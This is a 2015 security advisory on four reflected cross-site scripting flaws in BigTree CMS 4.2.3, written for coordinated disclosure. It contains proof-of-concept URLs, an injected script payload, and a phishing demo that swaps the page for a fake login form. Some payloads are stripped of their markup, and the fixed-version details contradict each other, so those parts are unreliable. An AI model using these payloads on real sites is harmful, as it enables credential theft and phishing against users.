BigTree CMS 4.2.3: Multiple Cross Site Scripting Vulnerabilities Security Advisory – Curesec Research Team Online Reference: http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-Cross-Site-Scripting-Vulnerabilities-38.html 1. Introduction Affected Product: BigTree CMS 4.2.3 Fixed in: 4.2.4 Fixed Version Link: https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip Vendor Contact: contribute@bigtreecms.org Vulnerability Type: Multiple Reflected XSS Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description Various components of the BigTree CMS are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger or perform phishing attacks. Please find attached three XSS attacks exploitable via GET, and one exploitable via POST requests. The attacks using GET requests can be exploited by getting the victim to click a link or visit an attacker controlled website. The attack using a POST request requires the victim to visit an attacker controlled website. XSS 1 (via POST) The script that processes Ajax requests for the file browser does not properly sanitize the "file" parameter, opening it up to reflected XSS. Sample POC:
Payload to load a remote script: "> Code: core/admin/ajax/developer/extensions/file-browser.php:127: " /> XSS 2 (via GET) The script that processes Ajax requests for the integrity check does not properly sanitize the "id" parameter, opening it up to reflected XSS. Limitations: Single and double quotes are escaped. Sample POC: http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id= Loading a remote script: http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id= Code: core/admin/ajax/dashboard/integrity-check/module.php:31: /" XSS 3 (via GET) The script that processes page view requests does not properly sanitize the "id" value that is given in the URL, thus opening it up to reflected XSS. Limitations: forward slash cannot be used Sample POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"> Loading a remote script: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"> Code: The input is echoed in multiple places: core/admin/modules/pages/_properties.php:54

core/admin/modules/pages/_properties.php:70

core/admin/layouts/default.php:153 /" XSS 4 (via GET) The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Limitations: forward slash cannot be used and single and double quotes are escaped. Simple POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: " Code: core/admin/modules/pages/_nav-tree.php:138 3. Proof of Concept Codes: 3.1 Example Phishing Site: The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker controlled server. var payload = document.createElement('div'); payload.innerHTML = " Trees of All Sizes Login

Trees of All Sizes

Remember Me

Forgot Password?
Version 4.2.3 · © 2015 Fastspot
"; document.replaceChild(payload, document.documentElement); 4. Solution To mitigate this issue please upgrade at least to version 4.2.3: https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip Please note that a newer version might already be available. 5. Report Timeline 07/07/2015 Informed Vendor about Issue 07/08/2015 Vendor send Fixes for confirmation 07/10/2015 Fixes Confirmed 07/26/2015 Vendor releases Version 4.2.3 08/07/2015 Disclosed to public